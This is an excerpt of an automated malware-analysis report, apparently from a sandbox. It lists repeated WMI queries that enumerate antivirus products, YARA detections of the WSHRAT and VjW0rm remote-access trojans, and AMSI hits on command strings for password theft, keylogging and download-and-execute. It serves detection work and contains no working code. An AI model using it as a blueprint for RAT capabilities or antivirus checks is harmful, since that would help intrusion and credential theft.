              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected WSHRAT
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
              Yara detected VjW0rm
              Source: Yara matchFile source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected WSHRAT
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
              Detected WSHRat
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string up-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string get-pass
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string down-n-exec
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string keylogger
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: Suspicious string take-log
              Yara detected VjW0rm
              Source: Yara matchFile source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
